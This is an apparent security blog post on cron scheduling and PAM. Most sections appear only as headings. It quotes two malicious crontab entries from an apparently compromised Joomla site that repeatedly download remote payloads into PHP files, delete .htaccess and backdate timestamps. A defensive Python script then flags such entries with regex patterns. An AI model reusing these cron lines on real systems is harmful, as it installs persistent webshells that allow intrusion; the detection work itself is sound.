The power of cron

Using the crontab command

Who can use this command?

Scheduling jobs

cron vs. anacron

No, not the artist!

What does cron have to do with security?

About PAM

Another PAM
  • account modules check that the specified account is a valid authentication target under current conditions. This may include conditions like account expiration, time of day, and that the user has access to the requested service.
  • authentication modules verify the user’s identity, for example by requesting and checking a password or other secret. They may also pass authentication information on to other systems like a keyring.
  • password modules are responsible for updating passwords and are generally coupled to modules employed in the authentication step. They may also be used to enforce strong passwords.
  • session modules define actions that are performed at the beginning and end of sessions. A session starts after the user has successfully authenticated.
The account tab will be set to “required” by default.
Change the account tab to “sufficient” as seen here.
From Xiaodong Lin, Introductory Computer Forensics: A Hands-on Practical Approach, Springer, 2018, p. 310.

How a malicious actor could use cron to establish persistence

*/3 * * * * chmod 0755 /home3/infectedsite/public_html/libraries/joomla/utilities/compat/compat.php; wget http://  www.xxx  .com/wdc.txt -O /home3/infectedsite/public_html/libraries/joomla/utilities/compat/compat.php >/dev/null; 
* */6 * * * wget http:// www.xxx .com/PDF/rbkvgqdyle.txt -O /home3/infectedsite/public_html/libraries/simplepie/idn/7cuyng9o1a.php >/dev/null; fetch -o /home3/infectedsite/public_html/libraries/simplepie/idn/7cuyng9o1a.php http:// www.hestonsflorist .com/PDF/rbkvgqdyle.txt >/dev/null 2>&1; touch -t 201104202045 /home3/infectedsite/public_html/libraries/simplepie/idn/index.html >/dev/null; chmod 0755 /home3/infectedsite/public_html/libraries/simplepie/idn/.htaccess >/dev/null; rm /home3/infectedsite/public_html/libraries/simplepie/idn/.htaccess >/dev/null; touch -t 201104202045 /home3/infectedsite/public_html/libraries/simplepie/idn/.; touch -t 201104202045 /home3/infectedsite/public_html/libraries/simplepie/idn/7cuyng9o1a.php >/dev/null
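
An added example, not part of the original article: a small Python triage script that flags crontab entries with the traits of the two entries above, namely a downloader (wget/fetch) writing its output into a .php file and touch -t backdating of timestamps. The rule names, the sample crontab, the example.invalid host and the /var/www paths are constructed for illustration.

```python
import re

# Heuristics drawn from the crontab entries shown above (assumed rule set; tune per host).
RULES = {
    "downloader": re.compile(r"\b(wget|curl|fetch)\b"),
    "writes_php": re.compile(r"-[oO]\s+\S+\.php\b"),         # download saved as a PHP file
    "timestomp": re.compile(r"\btouch\s+-t\s+\d{8,}"),       # mtime set to a fixed past date
    "output_suppressed": re.compile(r">\s*/dev/null"),
    "chmod": re.compile(r"\bchmod\s+0?[0-7]{3}\b"),
}

def split_entry(line):
    """Return (schedule, command) for a user-crontab line, or None for
    blanks, comments and environment assignments such as MAILTO=root."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.startswith("@"):                                 # @reboot, @daily, ...
        parts = line.split(None, 1)
        return (parts[0], parts[1]) if len(parts) == 2 else None
    parts = line.split(None, 5)                              # five time fields + command
    if len(parts) < 6 or "=" in parts[0]:
        return None
    return " ".join(parts[:5]), parts[5]

def audit(crontab_text):
    """Return [(line_no, schedule, [rule names])] for entries worth a manual look."""
    findings = []
    for lineno, raw in enumerate(crontab_text.splitlines(), 1):
        entry = split_entry(raw)
        if entry is None:
            continue
        schedule, command = entry
        hits = sorted(name for name, rx in RULES.items() if rx.search(command))
        # Escalate only on the two strongest signals; other hits are context.
        if "writes_php" in hits or "timestomp" in hits:
            findings.append((lineno, schedule, hits))
    return findings

# Constructed sample crontab (output of `crontab -l` would be fed in the same way).
SAMPLE = "\n".join([
    "# constructed sample",
    'MAILTO=""',
    "0 2 * * * /usr/local/bin/backup.sh",
    "*/3 * * * * wget http://example.invalid/a.txt -O /var/www/site/lib/compat.php >/dev/null",
    "15 4 * * 0 touch -t 201104202045 /var/www/site/lib/index.html",
    "@daily /usr/bin/certbot renew -q",
])

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```

A hit is a reason to inspect the entry and the file it writes, not proof of compromise; legitimate jobs can also download files or adjust timestamps.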

Alex Myers Security Engineer
